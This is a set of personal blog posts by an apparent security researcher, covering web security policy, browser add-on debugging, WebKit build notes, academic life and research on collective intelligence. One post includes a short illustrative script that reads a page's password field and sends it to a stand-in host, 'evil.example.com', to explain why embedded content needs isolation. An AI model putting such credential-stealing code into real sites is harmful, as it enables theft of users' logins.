terriko: (Pi)
2012-06-25 11:14 am

object object object... goose?

In the course of my thesis work, I made myself a little Firefox plugin that tells me where the javascript/dynamic parts are in a page. It's a fun little thing, just puts some big coloured boxes up, and I used it to help understand how people were using javascript in practice. It's one of those things I should probably release just 'cause it's fun, but I didn't have time to maintain it in any meaningful way so I never got around to it.

Anyhow, I pulled it out last week to see what state it's in because I want to adapt some ideas from it, and it wasn't working. Which is odd, 'cause it's really quite simple. The core is just a loop that goes through each page element and looks for stuff like onmouseover events:


var allTags = document.getElementsByTagName("*");
for each (var tag in allTags) {   // Mozilla-only "for each...in" syntax, which iterates over values
    // ... do some stuff (look for onmouseover handlers and the like)
}


And in debugging it, I've learned that getElementsByTagName("*"), which apparently used to return all the tags as objects, is now returning all the tags as well as, inexplicably, a number. It's not the same number for every page, and most of them seem to be around one thousandish on the simpler pages I was trying to test. Which sort of makes me think that maybe it's returning the number of tags, or that it sometimes returns an ordinal index for a single tag instead of an object, but why?

As it turns out, it didn't take much to get my add-on back up and running, just a quick check to see if the "tag" in question was in fact an object. But I'm left with a question: why has this changed in Firefox since I initially made the add-on? I'm not even sure where to ask, since it doesn't seem like it's a thing that changed in the specs. I'm recording it here for posterity so I remember to try to look it up later, but if you happen to know what's going on, please get in touch!
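(For my own records, the workaround boils down to something like this, reusing the loop from above with its body still elided:)

var allTags = document.getElementsByTagName("*");
for each (var tag in allTags) {
    // Skip the mystery number (and anything else that isn't an element object)
    if (typeof tag !== "object") {
        continue;
    }
    // ... do some stuff
}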
terriko: (Default)
2012-03-02 04:13 pm

"[Being different] over a whole lifetime, adds up to an enormous amount of needless trouble."

I'm re-reading Richard Hamming's talk on You and Your Research because I felt like I needed the kick in the pants to do great work this month after some very busy months of doing necessary but not necessarily great things.

In this reading, I was struck by this anecdote:

John Tukey almost always dressed very casually. He would go into an important office and it would take a long time before the other fellow realized that this is a first-class man and he had better listen. For a long time John has had to overcome this kind of hostility. It's wasted effort! I didn't say you should conform; I said "The appearance of conforming gets you a long way." If you chose to assert your ego in any number of ways, "I am going to do it my way," you pay a small steady price throughout the whole of your professional career. And this, over a whole lifetime, adds up to an enormous amount of needless trouble.


On a surface level, I've long believed this is true. I've long been primed in the art of social hacking, first by my father and more recently as a security researcher/hacker. Anyone who watches the subtle variations in how I dress on teaching days or days when I'm going to the bank will note that I pay attention to fitting in to the environment and manipulating the way in which I'm perceived. But as a child of the Internet, more or less, my experimentation hasn't been limited to physical presentation. Especially as a teenager, I spent a lot of time grossly misrepresenting my age and gender as well and watching how that changed my interactions with folk.

But what gets me this time is the end of that quote: "[If you don't appear to conform,] you pay a small steady price throughout the whole of your professional career. And this, over a whole lifetime, adds up to an enormous amount of needless trouble." Sometimes it's important to change the system, but sometimes you just want to get stuff done.

I can dress the part, but I don't generally change my gender presentation in real life. Is my female-ness adding up to an enormous amount of needless trouble over my lifetime given that I work in a field where that's going to make me non-conforming? I suspect it is, although I'm fortunate enough that my gender presentation is often canceled out by my racial makeup (Asian girls are totally good at math, don'tcha know?) so I can console myself by saying maybe it's not as enormous as it might have been. But not every person who doesn't fit the norm for their field has that consolation prize. Are we all paying the price of being different?

It's easy to get a little saddened by this. All that time explaining that no, I really am a techie, has added up to a lot of time I'm not having amazing conversations and doing great work. But before you get too saddened about how your hard-to-hide features like race/age/gender are affecting your ability to Do Great Things, you should stop and listen to Duy Loan Le's excellent 2010 Grace Hopper Celebration Keynote. In it, she talks about what she does to fit in to environments where she felt that letting go of her ego made it possible for her to get more good work done. I think it's really worth a listen, especially if fitting in isn't just a choice of what suit to wear for you.

terriko: I am a serious academic (Twilight Sparkle looking confused) (Serious Academic)
2012-02-04 01:34 am

Ants & the academic dream

When I was an undergraduate, I found that university really wasn't living up to my expectations of stimulating, interesting people and ideas.

But today, I was totally living the academic dream.

We had a visit from a leading expert on ant behaviour. This wasn't about computer ant algorithms; she studies real live ants. We started off the day with her talk on the Turtle Ants she's been studying in Mexico, a talk filled with pictures of ants and paths and grad students on ladders pointing at the trees. A talk filled with speculation about behaviour and patterns and analogies to search in computer networks and bifurcation of biological trees. Over the course of the day, the group talked ants, bees, simulations on the computer and using robots, immunology, flu and t-cells in the lung, patterns and theories. It was the kind of conjunction of ideas from multiple disciplines where things were just clicking and questions and potential experiments started getting debated.

Biochemistry from my scientist parents, ecology and field work from Macoun Club, immunology from the above plus my own master's research, algorithms from math and CS... I was pretty proud of myself for knowing the jargon pretty much across the board and being able to keep up. I love that I'm with a group where seemingly disjoint backgrounds are consistently recognized as a huge advantage, and my own particular background fits right in.

I learned a bunch about ants and flu today. My notebook is filled with doodles of ants and cells doing stuff. Apparently turtle ants, since they have paths in the trees, sometimes get the paths broken when the wind blows, and the ants just back up and wait for the wind to blow the branches back so they can keep going. I learned that swine flu's replication rates in cells are a hundred times higher than avian flu (and ~20 times more than regular flu) but avian flu does other things to suppress immune response. I learned some about how T-cells get into the lungs and find infection despite the fact that they don't seem to move fast enough to explain how well we handle infection. And I got to watch people putting ideas together in ways that might result in using experiments in ants to try to explain things that would be much harder to test in the lungs, and so many ideas that probably just couldn't happen anywhere else.

So if you've been wondering why the heck I moved here despite the many downsides (the US/desert/altitude/regional poverty/city, etc.)... this is why: cutting-edge research at the conjunction of biology, computing, and maybe a few fields besides. Even if I decide to do something else once my contract runs out, this has already been amazingly worthwhile, and with my own project starting to take shape, I'm pretty sure it's just going to get better!
terriko: I am a serious academic (Twilight Sparkle looking confused) (Serious Academic)
2011-12-05 02:26 pm

Looking for open source projects with good test suites

This was originally posted on But Grace, but I don't want my regular blog to wind up devoid of technical content, so I suspect I'll be crossposting all my posts from there in their entirety.

One of the cool things going on at work is some software we have that automates the creation of small bug fixes. We're looking to try it on some more active projects with real bugs, but we need projects with reasonable test case coverage so that the automated system can also ensure that it isn't causing other things to break in making the fix. Basically, we're potentially offering up a bunch of free bugfixes if your open source project has decent test cases. Pretty good deal, I hope.
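In case it helps to picture what we need the test suite for, the validation step boils down to a loop something like this. This is just a sketch in javascript (node), and the commands, paths and the candidateIsAcceptable name are all made up for illustration; the real system is rather more involved.

var execSync = require("child_process").execSync;

// Hypothetical check: apply one candidate patch, run the project's own test
// suite, and only keep the patch if nothing breaks.
function candidateIsAcceptable(patchFile) {
    execSync("git apply " + patchFile);           // apply the machine-generated fix
    try {
        execSync("make check");                   // stand-in for "run the full test suite"
        return true;                              // bug fixed, no regressions detected
    } catch (e) {
        return false;                             // a test failed; discard this candidate
    } finally {
        execSync("git apply -R " + patchFile);    // back out so the next candidate starts clean
    }
}

Without a decent test suite, that middle step can't tell us anything, which is why I'm hunting for projects that have one.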

Open source projects with good test suites



But how do we find software with good test cases? Here's a few I know of off the top of my head:

Firefox: a brief search turns up some automated tests. (My fuzzy memory suggests there was more than these...)
Gnumeric: extensive regression tests for each function. (The function tests are in .xls spreadsheets, so we could potentially apply them to other spreadsheet software.)
SQLite: they claim extensive test coverage. (Very promising!)
Webkit (Chrome, Safari): a brief web search turns up regression tests for javascript. (I believe the Chromium project has even more tests.)


Can anyone suggest other software or more details (and better links) on the things I have mentioned already?

Open source routing software



For various reasons, I've been encouraged to try experiments on open source routing software. There's some existing academic literature on the types of bugs found in open source routers, and it seems like our automated patch creation system would be a good fit, especially since router bugs often cause huge outages or security problems, and having a temporary patch to solve the problem right away could be a huge boon.

My query on twitter generated a nice list of open source router software, but no one seems to know anything about test suites. Here's a table summarizing what I've found thus far:

Open source router software test suite information



Click: unknown. Nothing obvious, and given that it's on a university website, I'll be shocked if it has testing. ;)
dd-WRT: unknown. Nothing obvious in the wiki, but there were lots of hits I haven't investigated.
OpenWRT: unknown. Clearly there was interest in automated test suites in Jan 2011, but it's unclear to me if these are now around somewhere. Need to look more.
pfSense: no evidence of a test suite. Searching the dev wiki for "test" yields nothing likely, so I'm guessing there isn't one.
Quagga: there is a tests/ directory, but it looks unsuitable. "make test" doesn't work and "make check" pokes a bunch of directories but doesn't seem to do what I need; I can run the tests manually, but the output is currently meaningless to me. No one answered my question on #quagga, although another open source friend on #kernel.org suggested that the test suite may have been abandoned.
Tomato: no evidence of a test suite. The web site contains nothing useful, so if there is a test suite, it's likely being provided by someone else.
XORP: there is a tests/ directory; unsure if it's suitable, but it looks promising. I'm having some build errors and haven't been able to run the tests yet.


You'd think, perhaps, that reasonable test suites for routers would already exist. A generic test suite would be totally sufficient for my needs at the moment. And in fact, I've found a set of routing tests from the University of New Hampshire InterOperability Laboratory, but while their tests are well-described, it doesn't look like something we can run locally and repeatedly as we'd need to in order to test the auto-generated patches. I haven't yet found others.

Let's be clear: I don't really care what the router supports in great detail. The important thing for these tests is that there be a good test suite, and preferably a good bug queue so we can grab candidate bugs and bug test cases to try to solve them. Generally speaking, the bugs have been easier to find than the regression tests.

In summary...



I am looking for:

1. More information about router test suites.
2. Updates to my current tables of information. This represents a morning's work, so I'd be shocked if they're perfectly correct.
3. Any open source/free software projects with good test suites (and preferably good bug queues).

Again, the key here is that I need good test suites. I'm most interested in routing software at the moment, but I'm building up a list of alternative ideas if that doesn't pan out, so anything with good automated tests that I'll be able to run repeatedly is of potential interest. We've got access to a reasonable amount of computing power, so heavier-weight tests are fine as long as they aren't going to take all month to run.

We would love to contribute any fixes we find back to the community, so if you think your project might qualify please get in touch! I think the end result is going to be awesome for all involved: free bug fixes for the project, more impressive real-world validation of our automated patch creation system, and maybe even an academic paper out of it for some of the folk around here.
terriko: (Default)
2011-06-28 04:42 pm

Uniquely defining an HTML element

As some of you may know, my last paper was on visual security policy (ViSP), a neat idea I had about how to add security policy to a website in a way that was more in line with how sites are designed. I based it on my own knowledge working as a web designer, as well as ideas from a variety of friends who have worked or do work in the web space, professionally and otherwise.

You can read my presentation for the larger run-down or read the paper, but the idea behind ViSP is that it's sometimes very useful to subdivide pages so that, say, your advertisement can't read your password, or that funny video you wanted to embed doesn't get access to post blog entries, or whatever. Sadly, right now anything embedded in the page gets access to anything else unless some awfully fancy work has been done to encapsulate parts of the page. (And given how much people tend to care about security in practice, this doesn't get done as often as it should.) We currently just trust that any includes will play well, which is super awkward since malicious code can be inserted into around 70% of websites and you can't very well expect malicious code to play nicely.
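To make that concrete: any script you include, whether it comes from an ad network or that funny video's player, runs with full access to the rest of the page, so nothing stops it from doing something like the following. (The ids and URL here are made up, obviously.)

// somewhere inside ad.js, or any other script the page pulls in...
var password = document.getElementById("password").value;   // read the login form
new Image().src = "http://evil.example.com/collect?p=" + encodeURIComponent(password);   // ...and quietly send it home

That's exactly the sort of cross-component snooping the ViSP boxes are meant to rule out by default.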

Anyhow, I digress.

I'm updating this particular policy tool so that I can generate some policies to test, because I'm tired of building them manually, and my not-terribly-scientific method of clicking randomly on things to make policy has turned up a problem: what happens if you want to set policy for an element that's just one of many paragraph tags or whatever, not assigned an id?

With ViSP, we assigned an index based on how many such tags we'd seen, but I figured while I'm updating this surely I could find something more standard...

Turns out, no, that really is the best way to do it. At least according to the selectors API, which includes an nth-of-type() pseudo-class that seems to do pretty much what I want.
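For the curious, building up such a selector goes roughly like this. This is a sketch of the idea rather than the actual tool code, and the uniqueSelector name is just something I'm using for illustration.

// Build a CSS selector that uniquely identifies an element, falling back to
// :nth-of-type() indexes when there's no id to hang the policy on.
function uniqueSelector(element) {
    if (element.id) {
        return "#" + element.id;
    }
    var path = [];
    var el = element;
    while (el && el.nodeType === 1 && el !== document.documentElement) {
        // Count earlier siblings with the same tag name to get the :nth-of-type() index.
        var index = 1;
        var sib = el;
        while ((sib = sib.previousElementSibling)) {
            if (sib.tagName === el.tagName) {
                index++;
            }
        }
        path.unshift(el.tagName.toLowerCase() + ":nth-of-type(" + index + ")");
        el = el.parentNode;
    }
    path.unshift("html");
    return path.join(" > ");
}

// Sanity check: document.querySelector(uniqueSelector(tag)) should hand back the same tag.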

So now, if you're using my tool and want to define policy for a given tag, any given tag, we can make that work for you by building up a CSS selector to find it. Of course, it'd probably be cleaner to read if you only set policy on tags with ids or classes, but I don't have to require that as an additional hurdle to policy creation. I figure this is likely a net usability win when it comes to policy generation, and let me tell you, security policy is not a field known for usability wins. (So much so that if I google search for the words security policy and usability... I see a post by me on the front page suggesting usability studies on CSP.)

Anyhow... Thanks to having to learn querySelector earlier, I was already primed to create querySelectors for uniquely defining tags. Thanks Mozilla documentation! You're a terrific coding wingman, introducing me to all these awesome apis. ;)
terriko: (Default)
2010-10-10 12:24 am

Meritocracy? Might want to re-think how you define merit.

This has been cross-posted from Geek Feminism, but I found this research really fascinating so you're getting a full copy here too.

You might think if you put together a lot of smart people, you'd get a smart group, but new research into group intelligence shows that's not always the case. (For those of you who don't have access to online journal subscriptions through your local library or university, there are more details in the Carnegie Mellon University press release.)


What we found is that the intelligence of the team members was not significantly related to the collective intelligence, either positively or negatively.

[...]

Our first observation and the one that surprised us the most was that the proportion of females in the group seemed to be strongly predictive of the collective intelligence of the group.


However, when they looked more closely they realised that it wasn't the gender that mattered, but rather the social sensitivity of the group members (previous studies had shown that women tend to score more highly in social sensitivity).

It's not the intelligence of the group members that matters; it's their social sensitivity.

So the more socially sensitive your group members were, the better the group performed in measures of collective intelligence. The key here is that group members need to collaborate, and to do that they need those social skills to help them work together. This includes some different conversational patterns: groups where one or two people dominated conversations exhibited low collective intelligence, while groups where more people contributed had higher collective intelligence.

This scientific research is potentially a big blow to the standard "meritocracy works" theory often espoused in open source and computing groups. Standard meritocracy rules say you do clever things and you get accepted, and this will make for perfectly good teams. But given that there's often bias that dismisses "soft skills," it turns out that folk may actually be using typical geek meritocracy rules to weed out some of the people we need to make the group most effective as a whole.


Some of my female colleagues would like to conclude that you simply just need to hire more women. While that might be easier, what it really suggests is that you need to pay attention to what people refer to as these "softer skills" and thinking about who's going to be a good team player, not necessarily focused solely on individual achievement, individual accomplishments.


So if you want to claim that the best way to build tech teams is meritocracy... you might want to think more carefully about how you define merit.





The quotes in this article are drawn from Bob McDonald's conversation with Dr. Anita Williams Woolley, the lead author, on the Quirks and Quarks interview aired October 9. You can download the podcast of the segment on collective intelligence here.
terriko: (Default)
2010-07-08 04:47 pm

HotSec & LinuxCon or How I wound up speaking in 2 cities in 3 days (totally different topics too!)

My paper was accepted to HotSec! This is the web visual security policy research I've been working on for a while in various forms, but this is my first proper paper on the subject (although some of the related issues were touched upon in my W2SP paper). Getting into HotSec is rather a big deal, as it's among the top publishing venues available to me. Mine was one of 11 papers chosen (out of 57). Go me! So I'll be heading down to DC on August 10th to present it. If you're curious, we should have the final camera-ready copy done in a few days.

My HotSec acceptance causes a bit of a logistical problem, though, since I've also been accepted to speak at LinuxCon on August 12th. It's a bit of a long story as to how I ended up applying at all, but the short and relevant part is just that I wasn't originally planning on submitting to HotSec and didn't realise I'd have such a conflict. (There's a longer story involving speaker diversity issues and good folk willing to go out of their way to work on solving them.)

Anyhow, I really *should* send my regrets to LinuxCon as, academically speaking, it makes a lot more sense for me to go to USENIX Security immediately following HotSec. Especially this year, as I'm hoping to graduate soonish (more ish than soon; don't get too excited) and should be networking as much as possible. But I chatted with my supervisor, and he agreed that it's a bit of a toss-up as to which is more valuable to me: it's nearly as likely that the person I need to meet will be at LinuxCon and that I'll wind up finding a job through open source connections. Raising my open source speaking profile may be just as useful.

What's clear is that Mailman benefits more if I go to LinuxCon, since I'm going to be talking about upcoming awesomeness in version 3.0. The other day, I had someone comment that they didn't even realise Mailman was in active development... ouch. I think getting people interested now, while we're in alpha, is probably absolutely perfect timing. Plus I'm hoping to have some nice stuff to show off from my excellent GSoC students, if they're willing to let me talk about what they've been doing with the archives, and maybe some of the other projects as well.

If you're interested in coming out to LinuxCon, they helpfully gave me a 20% discount code to share. Drop me a note and I'll pass it along (they asked we not just post the code publicly, but I can pop it in a private post later). If you can offer me a job then I'll be able to tell my supervisor I made the right choice. Heh. No, seriously, it's just nice to see people.

Anyhow, I'll make my final decision when I see if the travel arrangements are ridiculous, but it *should* be relatively easy to go from DC to Boston after HotSec, so let's hope this all works out!
terriko: (Default)
2010-06-18 03:35 pm

Compiling at last

Of course, now I've completely forgotten what I was going to do once I got this compiling...

Anyhow, for my own records, here's what I had to do to compile the WebCore portion of Webkit using XCode 3.1.4 (heh) under OS X 10.5.8.


  1. Follow these instructions for debugging.
  2. Make sure to compile JavaScriptCore (to get rid of the JavaScriptCore/Platform.h errors). Note that it has to be compiled into the same directory as WebCore.
  3. Edit CSSPropertyNames.h to add a property for CSSPropertyWebkitDashboardRegion (I was getting a bunch of errors saying it wasn't defined in that scope).
  4. Make sure that the WebCoreSQLite3 library can be found by adding WebKit/WebKitLibraries to the library search path.


Doesn't seem so bad, now that I've got them enumerated. I'm guessing the CSSPropertyWebkitDashboardRegion thing is an actual bug in how the scripts are called in xcode? Guess it's generated, and I need some flag to make it generate correctly? Anyhow, this works for now. Pity it took a couple of days to get it sorted out.
terriko: (Default)
2010-06-17 03:06 pm

Following up on following the instructions

As a follow-up to yesterday's irked post. This post is largely for myself in case I wind up getting these or similar errors again and can't remember what I did.

Context: I'm hoping to use WebKit to try out some research ideas. It builds fine using the build-webkit script provided, but balks when I try to build it in XCode.

If you're getting a pile of errors when building WebKitCore (e.g. following the instructions here) that are all about JavaScriptCore/Platform.h, then the problem is just that you need to build JavaScriptCore first. And make sure that you've got the BuildOutput set to be in WebKit/WebKitBuild for both, or they won't see each other.

Also, this seems like a nice summary of the cleanup steps if you're trying to make sure you're not using any old files.

It's still not building perfectly for me, but I'm not getting 10k errors anymore so clearly I'm getting closer to having this working. ;) Of course, I've also discovered the WebKitTools/Scripts/debug-safari script which runs it in gdb, so I probably don't need to be doing this anymore to have a debugger, but now I figure it's a halfway decent learning experience.

The biggest problem with WebKit, other than my current build errors, is that a full build takes an hour. That's a lot of time to kill while my code's compiling. And I'm so used to working with web code/scripts that I'm not used to optimizing my time while the compiles happen! I've already caught up on my email, folded the laundry, had a shower... and now I'm blogging while I try to let WebCore finish and see if it gets more than the 4 errors it's already got.
terriko: (Default)
2010-06-16 04:13 pm

Note to self: try following the instructions

You know what's annoying? Trying to fix include paths in my build when what I really needed to be doing was following the instructions.

I was feeling really foolish when I saw that, but now that I've followed said instructions, it still doesn't work... Oh, coding. When you sometimes don't know if you've just typed the wrong character somewhere or if the whole thing is horribly broken. I'm sure this will be very obvious when I look at it later, but I've got a rehearsal to get to.
terriko: (Default)
2010-04-07 11:23 pm

Demonstrating my awesome presentation skillz

Tomorrow, I'm presenting as part of the Celebration of Women in Science and Engineering at Carleton. It's going to be a really fun event showcasing some of our female students, faculty and staff. In fact, you can hear us talk about it on CBC Radio 1 sometime early tomorrow morning... I'm guessing around 6:20am, but I foolishly forgot to ask.

To give you a taste of my research talk, here's a couple of slides. But you'll have to come for the whole thing to learn about how to cause Facebook drama and call it science, or how I managed to fit a LOLcat into my professional research presentations.





I'm on to talk about my research at 2:30 Thursday (tomorrow!) in 5115HP. Or 11:30 if you want to see me be even more snarky regarding misconceptions and computer science.
terriko: (me)
2010-02-04 05:30 pm

Thesis Proposal Defense Date

I now have a proposal defense date: March 3rd.

I believe the paperwork is still going through, so I won't assume the date is set in stone 'till I get the official call confirming that that works for all involved. But the upshot of this is that I need to get the final draft of the proposal to my committee by Feb 10th. (Oh, did I mention I have a committee? They're awesome.)

Anyhow. Me. Proposal. Less than a week from now.

It's almost there, so while there may be some terror and hysteria happening, it's mostly relief. Promise! But there is still work to do, so if I'm scarce for a bit, don't be too surprised.
terriko: Yup, I took this one. The eyes are paper, not photoshop (chair)
2010-01-25 07:16 pm

Re: [*****SUSPECTED SPAM*****] Investigating the Role of Proximity on OSS Project Innovativeness and Success

This is a letter I just sent to several researchers who were conducting a survey on open source developers. As you can see below, I never answered the survey, and I explain why in hopes that future researchers will learn from these mistakes and present more compelling research initiatives.

Dear Barbara Scozzi and Antonio Messeni Petruzzelli,

I just wanted to let you know why I never took part in your survey, despite the fact that I have taken part in similar surveys in the past.

The first reason should be readily apparent from the subject line of this message: your message really looked like spam. This was especially true when I received multiple copies of the message from your team, to the same email address.

The second is that you sent the survey in Microsoft Word (.doc) format, which seems like an inappropriate choice when contacting open source software developers. Typically, OSS developers prefer to use open source alternatives such as Open Office, and many people have been burned by years of MS Word viruses and are justifiably hesitant to open such an attachment. And honestly, I would have preferred to do a quick web survey rather than spend time opening, editing and returning a document to you. There are a variety of survey tools available and I highly recommend you investigate these options for future research. They can make the task of responding to your survey much less onerous for participants.

The third is that you managed to mis-spell my first name in the salutation of the first email I received from your research team, despite the fact that my first name is spelled correctly in the Sourceforge user data you seem to have used to find me. While this may seem minor, this sort of small rudeness did leave me with a negative first impression of your team.

Finally, you may wish to be aware that if you are reaching current GNU Mailman developers, as seemed to be the case, you may do better searching on Launchpad, which we switched to for development over a year ago, if memory serves.

You may wish to take a look at Mary Gardiner's writings regarding how best to present yourselves and your research when doing such surveys. She has a very short summary here:

http://geekfeminism.org/2010/01/04/gf-classifieds/#comment-3355

And further discussion of related issues here:

http://puzzling.org/logs/thoughts/2010/January/6/ethics

Thank you for your time, and I hope this letter helps you engage more participants in your future endeavours.

Terri
terriko: (Default)
2009-10-04 11:53 pm

Dealing with Criticism

I was going to do all kinds of GHC wrap-up blogging today, but it was not to be, so here's my post about dealing with criticism for the CU-WISE blog instead. I wrote it with academia in mind, but you'll find it applies equally to open source development (which also has a lot of peer review!), or just general life. Enjoy!


Academia can be a really harsh environment. I once got a peer review that claimed the research in our paper was "crappy." Not exactly professional language, that! The review was so bad that we had to laugh, but that doesn't mean we didn't take the criticisms they included seriously: the next version of the paper was accepted to one of the top conferences in the field, in part thanks to that reviewer's highly critical comments.

Criticism can hit people hard: I heard one woman crying in the washroom while her friend consoled her and told her that really, the prof who had told her off was being unprofessional. Sometimes when a TA tells you your assignment was terrible, when a prof makes fun of you in class, when your paper gets rejected... it's hard to know how to deal. Venting to a friend is not a bad idea, but sometimes you can do even more to build on the otherwise "crappy" experience of receiving harsh criticism.

So here's some tips from TinyBuddha.com on dealing with harsh criticism:

10 Ways to Deal with Harsh Criticism



1. Use it. If someone delivers criticism in a nasty or thoughtless way, you may tune out useful information that could help you get closer to your dreams. Put aside your feelings about the tone, and ask yourself, "How can I use this to improve?"

2. Put it in perspective. There are over 6 billion people in the world. Even though only a small percentage has had a chance to see your work, odds are the criticism came from a small percentage of that.

3. Acknowledge it isn't personal. If someone doesn't like what you're doing, it doesn't mean they don't like you. Their interpretation of your work reflects how they see themselves and the world. Everyone sees things differently. No matter what you do, you'll only please some of them.

4. If it is personal, realize that makes the criticism even less relevant. If someone doesn't like you as a person for whatever reason, their thoughts on your project proposal hold no weight. Your job, then, is to let them make their choice--not liking you--and stop giving them power to hurt you.

5. Turn false criticism back on the critic. If someone says something harsh, seemingly without merit, realize it speaks more about them than you. Your work is not the problem--their attitude is.

6. Look for underlying pain. When someone is unnecessarily cruel, they generally want to get a rise out of someone--often as a way to deflect whatever pain they're carrying around. When you see the pain under someone's negativity, it helps turn your anger, frustration, and hurt into compassion and understanding for them.

7. Look at the critic as a child. Most children are honest to a fault, yet adults take their feedback with a grain of salt because there's much they don't understand about the world. The same can be said about your critic; he doesn't understand what you're trying to do, and therefore is missing some of the picture.

8. Define your audience. Whatever you're trying to accomplish, odds are it's meant to help a specific group of people. If you're building a web application for mothers, criticism from a 65-year old man carries a different weight than criticism from a mom.

9. Take the opportunity to develop a thicker skin. If you'd like to help many people, you'll have to listen to a lot of others who think you're doing a bad job. It's the nature of reaching a large audience--a portion will be unimpressed, no matter what you do.

10. Challenge yourself to keep going. One of the hardest parts of fielding criticism is letting go and moving forward. Don't let one person's negativity convince you to stop what you're doing. Whether you change your approach or keep doing the same thing, keep going. No matter what.
terriko: (Default)
2009-05-09 05:14 pm

Beautiful things are more functional

In the course of doing some thesis research, I stumbled across this fascinating paper in aesthetics and usability.

I'm not sure I've ever read a paper where the researcher seems so thoroughly flummoxed by his/her results.

The idea of the study was to test whether objects rated as more beautiful would also be rated as more functional. The author, I suspect, found this idea faintly ridiculous, but previous work in Japan had shown that people did indeed rate prettier banking machine interfaces as more usable. He suspected that perhaps this was just an effect related to Japan, whose "culture is known for its aesthetic tradition." He would repeat the study in Israel, where the culture has a stronger emphasis on action over form. Surely, he thought, the practical Israeli people would not be as affected by aesthetics.

But what happened? "Unexpectedly high correlations." As the author says, "usability and aesthetics were not expected to correlate in Israel," but they did. Oh, they did.

Even though I'd not read this paper until this week, it's something I'd noticed in doing basic testing of my web projects (back when I made more of a living writing web code rather than deconstructing and mocking... errr... inspecting its security). I used to test designs on clients and friends, and invariably I'd get more positive (and useful!) feedback if I spent the bit of extra time to make the first draft look clean, if still aesthetically simple. Pretty matters.

It's kinda nice to have a couple of scientific papers to back up one's gut feelings, eh?




Want more than a gut instinct to explain why attractive things work better? Don Norman suggests an answer in his book, Emotional Design: Why We Love (or Hate) Everyday Things. (I noticed it when seeing who had referred to this study, and I'm working my way through it. Research is fun!)

The theory goes like this: pretty things change your emotions in a positive way, make you happy, less stressed. Your emotional state changes your perceptions and ability to work. When you are happier, you often find things easier to use. Thus, pretty things are easier to use. And ugly things make you more easily annoyed, stressed out. Stress makes you perform poorly. Thus, ugly things are harder to use.

And in honour of the new Star Trek movie, I'll finish with a single word:

Fascinating.
terriko: (Default)
2009-05-05 01:41 pm

On the subject of typography & design vs security policy

The story thus far:

Terri, stuck in one of those bits of PhD that seem never-ending, realized that she needed two new sections in her thesis: one on typography & design, to prove a point about web pages, and one on security policy, to prove a point about how difficult getting it right can be. But then all of her hardware decided it needed replacing Right Now, thus making it nigh impossible to work, and after spending entirely too long debugging and replacing stuff, she decided to console herself by buying a zombie game to test her new network equipment. That's a perfectly valid response to stress, really.

We now return to her regularly scheduled thesis development...



In the course of working on these two pieces at more or less the same time, I've noticed that security policy shares a bit more with visual page design than I might have initially thought.

Security policy is designed to be both rigid and flexible. The idea is that if you do it right, it should be hardened, unbreakable, no loopholes. But the policy languages have to be sufficiently flexible to accommodate varied types of policy and capture desires from different organizations.

Graphic design is one of those places where "the rules are made to be broken." Flexible first, but with a rigid structure to help guide you. And practical constraints regarding readability, screen sizes, printing sizes, etc. also affect design choices. It feels a bit like it's backwards from security policy: in graphic design, the flexibility is stressed first, and the rigid constraints are acknowledged after the fact.

There's a lot more math than one might expect in design. And in security policy. I took the grad security course at Ottawa U, and wanted to smack some of my colleagues as they complained incessantly every time the prof so much as mentioned math. I don't know how they thought they were going to comprehend basic cryptography without at least a few equations... but after reading parts of The Elements of Typographic Style last night, I wonder how many designers expected to learn about the golden mean and regular polygons? I'm a mathematician originally, so I delight in finding such things, but I know that's atypical in general (less so among geeks).

Good security policy is nigh invisible to the legitimate users. If it prevents you from doing your job, it's probably not good policy, right? Ditto for graphic design, in some ways. It seems weird to talk about a visual medium as "invisible" but in a lot of cases, you want the content to be doing the talking -- the design is a way to frame it nicely. It should be quietly doing its job, making the viewer feel better about the content, without the viewer noticing.

Of course, invisibility isn't always the desired thing for either medium: sometimes you want attackers to see that big impenetrable wall. Sometimes you want someone to be drawn in by the artistry of a design. But a real whiz at either security policy or design likely needs to be able to cover both ends of the spectrum (and a good chunk in between).

I'm not sure entirely where I'm going with this train of thought, but I thought it was kind of interesting that they're not as dissimilar as one might think.